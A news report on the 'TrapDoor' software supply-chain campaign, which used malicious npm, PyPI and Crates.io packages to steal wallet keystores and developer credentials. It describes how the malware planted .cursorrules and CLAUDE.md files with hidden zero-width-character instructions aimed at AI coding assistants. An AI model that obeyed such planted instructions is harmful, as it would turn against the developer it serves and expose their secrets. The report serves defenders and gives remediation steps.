Researchers Detail 'TrapDoor' Supply‑Chain Attack That Hid Malicious Instructions in AI Assistant Files

Security researchers say a cross-registry software supply-chain attack dubbed TrapDoor used malicious developer-tool packages on npm, PyPI and Crates.io to target cryptocurrency wallet data and developer credentials, with an unusual twist: It also planted hidden instructions in AI coding-assistant configuration files. The findings point to a broad developer-tooling compromise with crypto implications, not a confirmed theft case.

Socket Security published a technical report on May 24, and the Cloud Security Alliance and its CSAI Foundation followed with a research note on May 26. Researchers said the campaign was publicly visible by May 22, when a PyPI package, [email protected], was uploaded at 20:20:18 UTC. Across the three package registries, they said the operation involved dozens of malicious package names and more than 384 published artifacts or versions. In Socket’s words, “TrapDoor crypto stealer hits 36 malicious packages across npm, PyPI, and Crates.io, targeting crypto, DeFi, AI, and security developers.”

According to the research, TrapDoor targeted crypto, decentralized finance and AI developers, specifically seeking wallet keystores and related data for Solana, Sui and Aptos. It also sought a wider set of developer secrets, including SSH keys, Amazon Web Services credentials, GitHub tokens, browser profile and login data, environment variables, API keys and local developer configuration files. That matters because a malicious package can compromise a developer laptop or a CI/CD system — the automated pipeline used to build and deploy software — and expose repository, cloud or wallet credentials upstream.

The delivery method varied by ecosystem. On npm, the packages used postinstall hooks, which run automatically after installation, to launch a shared JavaScript payload called trap-core.js. On PyPI, the malicious code ran when the package was imported, fetched a remote JavaScript payload from an attacker-controlled GitHub Pages site and executed it through node -e. On Crates.io, malicious build.rs scripts ran during Rust compilation, searched for local keystores, encrypted them and exfiltrated them; researchers said they observed exfiltration to GitHub Gists. Socket and CSA also linked the campaign to attacker-controlled GitHub infrastructure, including an account and GitHub Pages site used to host payloads and configuration.

What most distinguished TrapDoor, researchers said, was its use of AI assistant configuration files as a persistence and exfiltration surface. The malware planted .cursorrules and CLAUDE.md files containing hidden instructions encoded with zero-width Unicode characters — invisible characters such as U+200B, U+200C, U+200D and U+FEFF that software can read even when people cannot see them. The CSA research note was titled, “TrapDoor: Supply Chain Attack — Poisons AI Coding Assistants,” and described the method as a notable new vector involving AI assistants and, at scale, the first documented operational use of the technique.

The broader risk is that malicious-by-design packages can slip past standard vulnerability and software composition analysis scanners, which are generally built to find known flaws rather than packages that are themselves the attack. That makes behavioral analysis or pre-install scanning more important in cases like this. Some of the malicious packages had already been removed by the time Socket published its report, while others were still live at that time; the public reporting reviewed does not give a definitive current count. As of May 29, there were no publicly confirmed on-chain wallet drains or quantified stolen funds tied to TrapDoor.

Researchers said anyone who installed affected packages should audit project directories for unexpected .cursorrules and CLAUDE.md files, scan those files for hidden zero-width characters and treat the machine as potentially compromised even if there is no obvious sign of exfiltration. They also recommended rotating exposed SSH keys, AWS keys, GitHub tokens and wallet credentials or keystores.